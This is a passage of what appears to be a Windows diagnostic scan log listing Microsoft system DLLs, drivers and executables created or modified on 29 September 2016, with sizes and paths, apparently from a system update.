2016-09-29 15:14 - 2016-09-15 10:14 - 00119648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2016-09-29 15:14 - 2016-09-15 10:13 - 01264912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-09-29 15:14 - 2016-09-15 10:13 - 00113504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmapi.dll
2016-09-29 15:14 - 2016-09-15 10:12 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-09-29 15:14 - 2016-09-15 10:11 - 00773168 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppwinob.dll
2016-09-29 15:14 - 2016-09-15 10:10 - 01600632 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2016-09-29 15:14 - 2016-09-15 10:10 - 00918848 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll
2016-09-29 15:14 - 2016-09-15 10:06 - 01469120 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-09-29 15:14 - 2016-09-15 10:06 - 00587968 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-09-29 15:14 - 2016-09-15 10:06 - 00455520 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2016-09-29 15:14 - 2016-09-15 10:06 - 00387872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2016-09-29 15:14 - 2016-09-15 10:06 - 00050880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2016-09-29 15:14 - 2016-09-15 10:03 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2016-09-29 15:14 - 2016-09-15 10:03 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TempSignedLicenseExchangeTask.dll
2016-09-29 15:14 - 2016-09-15 10:03 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2016-09-29 15:14 - 2016-09-15 10:02 - 00187392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfksproxy.dll
2016-09-29 15:14 - 2016-09-15 10:01 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\findnetprinters.dll
2016-09-29 15:14 - 2016-09-15 10:00 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BcastDVRHelper.dll
2016-09-29 15:14 - 2016-09-15 09:59 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovslegacy.dll
2016-09-29 15:14 - 2016-09-15 09:58 - 00491008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2016-09-29 15:14 - 2016-09-15 09:58 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlancfg.dll
2016-09-29 15:14 - 2016-09-15 09:57 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.LowLevel.dll
2016-09-29 15:14 - 2016-09-15 09:57 - 00179712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2016-09-29 15:14 - 2016-09-15 09:56 - 00554496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2016-09-29 15:14 - 2016-09-15 09:56 - 00413184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll
2016-09-29 15:14 - 2016-09-15 09:56 - 00265728 _____ C:\WINDOWS\SysWOW64\Windows.Perception.Stub.dll
2016-09-29 15:14 - 2016-09-15 09:56 - 00262656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pdh.dll
2016-09-29 15:14 - 2016-09-15 09:55 - 01243136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.FaceAnalysis.dll
2016-09-29 15:14 - 2016-09-15 09:55 - 00222720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2016-09-29 15:14 - 2016-09-15 09:55 - 00213504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.CredDialogController.dll
2016-09-29 15:14 - 2016-09-15 09:55 - 00202752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.HumanInterfaceDevice.dll
2016-09-29 15:14 - 2016-09-15 09:55 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2016-09-29 15:14 - 2016-09-15 09:54 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mbsmsapi.dll
2016-09-29 15:14 - 2016-09-15 09:54 - 00461312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webio.dll
2016-09-29 15:14 - 2016-09-15 09:54 - 00431104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprdim.dll
2016-09-29 15:14 - 2016-09-15 09:53 - 00466432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppcext.dll
2016-09-29 15:14 - 2016-09-15 09:53 - 00314368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Usb.dll
2016-09-29 15:14 - 2016-09-15 09:52 - 00238080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2016-09-29 15:14 - 2016-09-15 09:51 - 02333184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll
2016-09-29 15:14 - 2016-09-15 09:51 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CryptoWinRT.dll
2016-09-29 15:14 - 2016-09-15 09:50 - 07219200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-09-29 15:14 - 2016-09-15 09:50 - 01534464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.3D.dll
2016-09-29 15:14 - 2016-09-15 09:50 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManHTTPConfig.exe
2016-09-29 15:14 - 2016-09-15 09:49 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll
2016-09-29 15:14 - 2016-09-15 09:47 - 00366080 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2016-09-29 15:14 - 2016-09-15 09:47 - 00355328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RTMediaFrame.dll
2016-09-29 15:14 - 2016-09-15 09:46 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2016-09-29 15:14 - 2016-09-15 09:46 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll
2016-09-29 15:14 - 2016-09-15 09:46 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ffbroker.dll
2016-09-29 15:14 - 2016-09-15 09:43 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imapi2.dll
2016-09-29 15:14 - 2016-09-15 09:43 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinesam.dll
2016-09-29 15:14 - 2016-09-15 09:43 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\splwow64.exe
2016-09-29 15:14 - 2016-09-15 09:43 - 00039424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdhid.sys
2016-09-29 15:14 - 2016-09-15 09:43 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll
2016-09-29 15:14 - 2016-09-15 09:42 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll
2016-09-29 15:14 - 2016-09-15 09:42 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2016-09-29 15:14 - 2016-09-15 09:41 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2016-09-29 15:14 - 2016-09-15 09:41 - 00168448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthA2DP.sys
2016-09-29 15:14 - 2016-09-15 09:41 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Printers.dll
2016-09-29 15:14 - 2016-09-15 09:41 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\NfcRadioMedia.dll
2016-09-29 15:14 - 2016-09-15 09:40 - 00348160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll
2016-09-29 15:14 - 2016-09-15 09:40 - 00194048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFi.dll
2016-09-29 15:14 - 2016-09-15 09:40 - 00160768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ACPBackgroundManagerPolicy.dll
2016-09-29 15:14 - 2016-09-15 09:40 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\VPNv2CSP.dll
2016-09-29 15:14 - 2016-09-15 09:39 - 02740224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2016-09-29 15:14 - 2016-09-15 09:39 - 00547840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Input.dll
2016-09-29 15:14 - 2016-09-15 09:39 - 00418304 _____ C:\WINDOWS\system32\Windows.Perception.Stub.dll
2016-09-29 15:14 - 2016-09-15 09:39 - 00295936 _____ (Microsoft Corporation) C:\WINDOWS\system32\pdh.dll
2016-09-29 15:14 - 2016-09-15 09:39 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-09-29 15:14 - 2016-09-15 09:39 - 00186368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Radios.dll
2016-09-29 15:14 - 2016-09-15 09:38 - 01291264 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2016-09-29 15:14 - 2016-09-15 09:38 - 00730112 _____ (Microsoft Corporation) C:\WINDOWS\system32\nshwfp.dll
2016-09-29 15:14 - 2016-09-15 09:38 - 00654336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll
2016-09-29 15:14 - 2016-09-15 09:38 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovhost.dll
2016-09-29 15:14 - 2016-09-15 09:38 - 00211456 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-09-29 15:14 - 2016-09-15 09:38 - 00205824 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchFilterHost.exe
2016-09-29 15:14 - 2016-09-15 09:38 - 00132096 _____ (Microsoft Corporation) C:\WINDOWS\system32\PrintWSDAHost.dll
2016-09-29 15:14 - 2016-09-15 09:37 - 00743424 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2016-09-29 15:14 - 2016-09-15 09:37 - 00680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdh.dll
2016-09-29 15:14 - 2016-09-15 09:37 - 00390144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Search.ProtocolHandler.MAPI2.dll
2016-09-29 15:14 - 2016-09-15 09:37 - 00321024 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkUXBroker.dll
2016-09-29 15:14 - 2016-09-15 09:37 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll
2016-09-29 15:14 - 2016-09-15 09:36 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Import.dll
2016-09-29 15:14 - 2016-09-15 09:36 - 00709120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll
2016-09-29 15:14 - 2016-09-15 09:36 - 00456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiobj.dll
2016-09-29 15:14 - 2016-09-15 09:36 - 00410624 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll
2016-09-29 15:14 - 2016-09-15 09:36 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2016-09-29 15:14 - 2016-09-15 09:36 - 00339456 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpusersvc.dll
2016-09-29 15:14 - 2016-09-15 09:36 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbmon.dll
2016-09-29 15:14 - 2016-09-15 09:36 - 00166912 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovslegacy.dll
2016-09-29 15:14 - 2016-09-15 09:35 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Vpn.dll
2016-09-29 15:14 - 2016-09-15 09:35 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppContracts.dll
2016-09-29 15:14 - 2016-09-15 09:35 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2016-09-29 15:14 - 2016-09-15 09:35 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.PointOfService.dll
2016-09-29 15:14 - 2016-09-15 09:35 - 00538112 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcext.dll
2016-09-29 15:14 - 2016-09-15 09:35 - 00496128 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprdim.dll
2016-09-29 15:14 - 2016-09-15 09:35 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Cortana.Desktop.dll
2016-09-29 15:14 - 2016-09-15 09:35 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll
2016-09-29 15:14 - 2016-09-15 09:35 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2016-09-29 15:14 - 2016-09-15 09:35 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Picker.dll
2016-09-29 15:14 - 2016-09-15 09:35 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2016-09-29 15:14 - 2016-09-15 09:35 - 00305152 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsvc.dll
2016-09-29 15:14 - 2016-09-15 09:35 - 00252416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll
2016-09-29 15:14 - 2016-09-15 09:34 - 00671744 _____ (Microsoft Corporation) C:\WINDOWS\system32\mbsmsapi.dll
2016-09-29 15:14 - 2016-09-15 09:34 - 00560640 _____ (Microsoft Corporation) C:\WINDOWS\system32\webio.dll
2016-09-29 15:14 - 2016-09-15 09:34 - 00424960 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2016-09-29 15:14 - 2016-09-15 09:33 - 00896512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2016-09-29 15:14 - 2016-09-15 09:32 - 00361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdesvc.dll
2016-09-29 15:14 - 2016-09-15 09:31 - 01912320 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll
2016-09-29 15:14 - 2016-09-15 09:31 - 01553408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll
2016-09-29 15:14 - 2016-09-15 09:30 - 01227264 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpsvc.dll
2016-09-29 15:14 - 2016-09-15 09:30 - 00458752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RTMediaFrame.dll
2016-09-29 15:14 - 2016-09-15 09:30 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.DeviceEncryptionHandlers.dll
2016-09-29 15:14 - 2016-09-15 09:30 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\CastLaunch.dll
2016-09-29 15:14 - 2016-09-15 09:29 - 01105408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MiracastReceiver.dll
2016-09-29 15:14 - 2016-09-15 09:29 - 01082368 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2016-09-29 15:14 - 2016-09-15 09:29 - 00715264 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll
2016-09-29 15:14 - 2016-09-15 09:28 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcfg.dll
2016-09-29 15:14 - 2016-09-15 09:27 - 05111296 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2016-09-29 15:14 - 2016-09-15 09:27 - 01078784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.dll
2016-09-29 15:14 - 2016-09-15 09:27 - 00883712 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2016-09-29 15:14 - 2016-09-15 09:27 - 00627200 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceControl.dll
2016-09-29 15:14 - 2016-09-15 09:27 - 00582656 _____ (Microsoft Corporation) C:\WINDOWS\system32\BootMenuUX.dll
2016-09-29 15:14 - 2016-09-15 09:27 - 00279040 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveui.dll
2016-09-29 15:14 - 2016-09-15 09:27 - 00250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\discan.dll
2016-09-29 15:14 - 2016-09-15 09:27 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\manage-bde.exe
2016-09-29 15:14 - 2016-09-15 09:27 - 00171008 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvenotify.exe
2016-09-29 15:14 - 2016-09-15 09:27 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Sens.dll
2016-09-29 15:14 - 2016-09-15 09:26 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll
2016-09-29 15:14 - 2016-09-15 09:26 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll
2016-09-29 15:14 - 2016-09-15 09:26 - 00112128 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerDeviceEncryption.exe
2016-09-29 15:14 - 2016-09-15 09:26 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdeui.dll
2016-09-29 15:14 - 2016-09-15 09:25 - 00947200 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_sr.dll
2016-09-29 15:14 - 2016-09-15 09:25 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll
2016-09-29 15:14 - 2016-09-15 09:25 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceAgent.exe
2016-09-29 15:14 - 2016-09-15 09:24 - 01080320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Ocr.dll
2016-09-29 15:14 - 2016-09-15 09:23 - 00650752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2016-09-29 15:14 - 2016-09-15 09:23 - 00631296 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2016-09-29 15:14 - 2016-09-15 09:22 - 01586176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll
2016-09-29 15:14 - 2016-09-15 09:22 - 00960000 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2016-09-29 15:14 - 2016-09-15 09:21 - 02208768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.3D.dll
2016-09-29 15:14 - 2016-09-15 09:21 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2016-09-29 15:14 - 2016-09-15 09:21 - 00674304 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2016-09-29 15:14 - 2016-09-15 09:20 - 01535488 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2016-09-29 15:14 - 2016-09-15 09:20 - 01266176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2016-09-29 15:14 - 2016-09-15 09:20 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsm.dll
2016-09-29 15:14 - 2016-09-15 09:20 - 00283648 _____ (Microsoft Corporation) C:\WINDOWS\system32\wkssvc.dll
2016-09-29 15:14 - 2016-09-15 09:19 - 01130496 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2016-09-29 15:14 - 2016-09-15 09:19 - 00903680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2016-09-29 15:14 - 2016-09-15 09:19 - 00788992 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe
2016-09-29 15:14 - 2016-09-15 09:19 - 00717824 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2016-09-29 15:14 - 2016-09-15 09:16 - 01817088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2016-09-29 15:14 - 2016-09-15 09:16 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2016-09-29 15:14 - 2016-09-15 09:16 - 00387072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SessEnv.dll
2016-09-29 15:13 - 2016-09-15 10:37 - 00402352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ws2_32.dll
2016-09-29 15:13 - 2016-09-15 10:35 - 01570680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-09-29 15:13 - 2016-09-15 10:32 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-09-29 15:13 - 2016-09-15 10:30 - 00646136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2016-09-29 15:13 - 2016-09-15 10:29 - 00218008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LsaIso.exe
2016-09-29 15:13 - 2016-09-15 10:29 - 00081760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\stornvme.sys
2016-09-29 15:13 - 2016-09-15 10:29 - 00023392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cmimcext.sys
2016-09-29 15:13 - 2016-09-15 10:28 - 00498960 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll
2016-09-29 15:13 - 2016-09-15 10:26 - 00090400 _____ (Microsoft Corporation) C:\WINDOWS\system32\devenum.dll
2016-09-29 15:13 - 2016-09-15 10:25 - 00262960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
2016-09-29 15:13 - 2016-09-15 10:24 - 00764936 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2016-09-29 15:13 - 2016-09-15 10:23 - 01503032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2016-09-29 15:13 - 2016-09-15 10:22 - 05722320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-09-29 15:13 - 2016-09-15 10:22 - 00975744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2016-09-29 15:13 - 2016-09-15 10:19 - 00361104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tsmf.dll
2016-09-29 15:13 - 2016-09-15 10:18 - 01201872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2016-09-29 15:13 - 2016-09-15 10:18 - 01123368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2016-09-29 15:13 - 2016-09-15 10:18 - 00955528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-09-29 15:13 - 2016-09-15 10:18 - 00856872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfreadwrite.dll
2016-09-29 15:13 - 2016-09-15 10:18 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2016-09-29 15:13 - 2016-09-15 10:17 - 04311736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2016-09-29 15:13 - 2016-09-15 10:16 - 07219672 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-09-29 15:13 - 2016-09-15 10:16 - 02190176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-09-29 15:13 - 2016-09-15 10:16 - 01738040 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2016-09-29 15:13 - 2016-09-15 10:16 - 01157000 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2016-09-29 15:13 - 2016-09-15 10:16 - 00657760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-09-29 15:13 - 2016-09-15 10:16 - 00401760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-09-29 15:13 - 2016-09-15 10:16 - 00206096 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2016-09-29 15:13 - 2016-09-15 10:15 - 00649568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2016-09-29 15:13 - 2016-09-15 10:15 - 00341936 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll
2016-09-29 15:13 - 2016-09-15 10:15 - 00223584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2016-09-29 15:13 - 2016-09-15 10:15 - 00130912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2016-09-29 15:13 - 2016-09-15 10:14 - 01100128 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2016-09-29 15:13 - 2016-09-15 10:14 - 00988512 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2016-09-29 15:13 - 2016-09-15 10:12 - 08158672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-09-29 15:13 - 2016-09-15 10:11 - 04673296 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-09-29 15:13 - 2016-09-15 10:06 - 01046880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-09-29 15:13 - 2016-09-15 10:00 - 00554496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdh.dll
2016-09-29 15:13 - 2016-09-15 10:00 - 00518656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ngccredprov.dll
2016-09-29 15:13 - 2016-09-15 10:00 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2016-09-29 15:13 - 2016-09-15 09:58 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Background.SystemEventsBroker.dll
2016-09-29 15:13 - 2016-09-15 09:58 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.UserDeviceAssociation.dll
2016-09-29 15:13 - 2016-09-15 09:57 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll
2016-09-29 15:13 - 2016-09-15 09:57 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2016-09-29 15:13 - 2016-09-15 09:56 - 00670208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.PointOfService.dll
2016-09-29 15:13 - 2016-09-15 09:56 - 00257536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DataExchange.dll
2016-09-29 15:13 - 2016-09-15 09:55 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\nshwfp.dll
2016-09-29 15:13 - 2016-09-15 09:55 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SmartCards.dll
2016-09-29 15:13 - 2016-09-15 09:55 - 00455168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetworkCollectionAgent.dll
2016-09-29 15:13 - 2016-09-15 09:55 - 00332288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
2016-09-29 15:13 - 2016-09-15 09:55 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2016-09-29 15:13 - 2016-09-15 09:55 - 00152064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\biwinrt.dll
2016-09-29 15:13 - 2016-09-15 09:54 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Ocr.dll
2016-09-29 15:13 - 2016-09-15 09:53 - 00340480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2016-09-29 15:13 - 2016-09-15 09:53 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll
2016-09-29 15:13 - 2016-09-15 09:52 - 01358336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2016-09-29 15:13 - 2016-09-15 09:52 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NaturalLanguage6.dll
2016-09-29 15:13 - 2016-09-15 09:52 - 00525824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintDialogs.dll
2016-09-29 15:13 - 2016-09-15 09:52 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptngc.dll
2016-09-29 15:13 - 2016-09-15 09:49 - 00901120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
